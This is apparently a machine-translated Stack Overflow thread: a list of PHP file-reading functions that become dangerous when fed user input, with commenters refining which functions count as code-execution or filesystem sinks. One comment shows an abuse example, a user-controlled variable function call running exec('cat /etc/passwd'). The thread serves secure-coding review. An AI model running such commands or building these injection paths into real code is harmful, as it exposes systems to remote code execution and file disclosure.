iptcembed
ftp_get
ftp_nb_get
// read from filesystem
file_exists
file_get_contents
file
fileatime
filectime
filegroup
fileinode
filemtime
fileowner
fileperms
filesize
filetype
glob
is_dir
is_executable
is_file
is_link
is_readable
is_uploaded_file
is_writable
is_writeable
linkinfo
lstat
parse_ini_file
pathinfo
readfile
readlink
realpath
stat
gzfile
readgzfile
getimagesize
imagecreatefromgif
imagecreatefromjpeg
imagecreatefrompng
imagecreatefromwbmp
imagecreatefromxbm
imagecreatefromxpm
ftp_put
ftp_nb_put
exif_read_data
read_exif_data
exif_thumbnail
exif_imagetype
hash_file
hash_hmac_file
hash_update_file
md5_file
sha1_file
highlight_file
show_source
php_strip_whitespace
get_meta_tags

Такие функции, как popen, необходимы для работы таких инструментов, как pear / pecl. Запомни.
@ Nikic хороший звонок, я знаю, что этот список раковин неполон.
@Rook: Ты в порядке с другими людьми, расширяющими этот список?
@ Да, конечно. Но я хотел бы просмотреть изменения, поэтому оставьте комментарий и / или подробно опишите функцию.
если вы считаете create_function вредной, подумайте также об анонимных функциях в php 5.3
@ts Я не думаю, что это можно использовать, потому что вы не можете передать объект или анонимную функцию как вред ($ _REQUEST []), поэтому preg_replace_callback () на самом деле не является приемником. Однако переменные функции - это $ _REQUEST ['func_name'] ($ _ REQUEST ['param']), которые можно использовать для вызова exec ('cat / etc / passwd'). create_function () принимает 2 строки, и вы можете передавать строки и массивы как переменные $_REQUEST[] .
@whatnick На самом деле я не вижу заметной разницы между PHP и другими языками веб-приложений. В конце концов, программистам нужна возможность eval() кода, выполнения системных команд, доступа к базе данных и чтения / записи в файлы. На этот код может повлиять злоумышленник, и это уязвимость.
Так много функций запрещено! Вы хозяин моего сайта случайно?
@ Эндрю Данн, ха-ха, нет. Если вы запретили все эти функции, тогда не будет работать ни одно приложение PHP. Особенно include (), require () и функции файловой системы.
@Rook: мои мысли точно, но это для потенциальных проблем, а не конкретных. При правильном использовании ни один из них не представляет непосредственной угрозы; но если их можно избежать, они должны быть.
@nikic О, да, спасибо, вы должны создать новый раздел только для обратных вызовов. (или я буду)
Добавил список (хотя, вероятно, их больше). Я использовал формат, который мне нужен, для своих собственных целей, и это наиболее удобно, если вы хотите использовать этот список, чтобы действительно сделать что-то полезное. Но не стесняйтесь настроить его на более читаемый формат;)
@Mike C: это просто список с функциями файловой системы. Вероятно, в этом нет ничего плохого, если половина из них;) @Rook: Должны ли быть удалены неопасные функции, такие как dirname или basename? Или лучше оставить их всех вместо того, чтобы удалить что-то потенциально опасное?
@nikic и @Mike C Вы правы в отношении функций файловой системы, к ним нужно обратиться, и любая помощь будет приветствоваться. И @nikic фантастическая работа, я дал вам пару +1 за это, Наслаждайтесь :)
dirname и basename - единственные, которые выделяются для меня.
@Rook: Спасибо :) Но почему вы удалили все функции f* ? Я думаю, что особенно ими можно злоупотреблять.
Другие, на которые нужно обратить внимание: preg_filter (может использоваться как preg_match), curl_ * (некоторые опции позволяют, например, записывать в файлы), getcwd, getlastmod, getmygid, getmyinode, getmypid, getmyuid (раскрытие всей информации), imagepng, imagegif (и т.д. позволяют записывать в файловую систему), ...
@nikic функции f *, которые я удалил, принимают дескриптор файла, и злоумышленник не может на них напрямую влиять. Однако функции, создающие дескриптор, такие как fopen() могут быть и остаются.
Imho preg_match с e не вредит. Руководство говорит: «Только preg_replace () использует этот модификатор; он игнорируется другими функциями PCRE».
@nikic Я понятия не имею, как «запутывание вызова функции» применяется к функциям taint / sink. Я отредактировал пост.
Я изменил порядок, потому что ни переменные, ни отражения не могут быть использованы для выполнения произвольного кода PHP. Они могут быть использованы для выполнения произвольных функций. И это больше относится к обратным вызовам (которые вызывают функции), чем к оценке PHP;)
Кроме того, почему вы добавили «должен сначала установить assert_options (ASSERT_QUIET_EVAL, 1);»? Я не вижу, как это связано с выполнением кода над assert . Это отключает отображение ошибок только в утверждении.
@nikic Если вы можете контролировать имя функции, то злоумышленник может указать любую php-функцию eval () или system (). Если вы можете управлять именем функции, передаваемой классу отражения, вы также можете получить удаленное выполнение кода php через eval. С точки зрения ASSERT_QUIET_EVAL мне придется провести некоторое тестирование. Снова должен подчеркнуть, что запутывание не имеет отношения к функциям стока.
@nikic assert идентичен eval, assert_options () не имеют смысла. документы для этой функции ужасны.
@Rook: Да, я знаю, что это то же самое, я добавил функцию ^^. Я просто был удивлен, что вы сказали, что вам нужен ASSERT_QUIET_EVAL для этого;) - Хотя я думаю, что переменные функции и рефлексия имеют больше общего с обратными вызовами (как выполняемые функции, а не код), это ваш список, так что если вы думаете что текущая версия имеет больше смысла ... извините за перестановку, не спрашивая.
Ладья, это невероятный ответ. Могу ли я предложить, чтобы вы добавили к самому верху жирным шрифтом что-то такое: «это не список« запрещенных »функций, которые вы никогда не должны использовать, это список функций, которыми вы должны быть очень осторожны с передачей пользовательского ввода из чего-то вроде $ _REQUEST "? Я думаю, что это прояснилось бы немного.
@Shabbyrobe Спасибо. Многие из них являются запрещенными функциями хостинговых компаний. Но если вы их забанят, то ничего не сможете сделать. Я думаю, что мой комментарий по поводу раковин решает эту проблему, по крайней мере, на мой взгляд.
Спасибо, Ладья, теперь все намного понятнее.
@Rook: Вы в порядке с функциями файловой системы, разделенными на r, w, rw? Имхо, это помогает классифицировать, насколько они опасны.
@nikic Это отличная идея. Вероятно, сделать другую категорию, а также.
@Rook: Я разделился на обработчик файловой системы (для функций f *), написание и чтение. Я не создавал дополнительную группу для чтения и записи, потому что иногда ее трудно различить (так как большинство функций сначала что-то читают перед записью). Надеюсь, я не ошибся в классификации.
@ nikic, черт возьми, ты на вершине этого.
обновлена теперь мертвая ссылка на исследование в алой
Эй, спасибо за исчерпывающий список!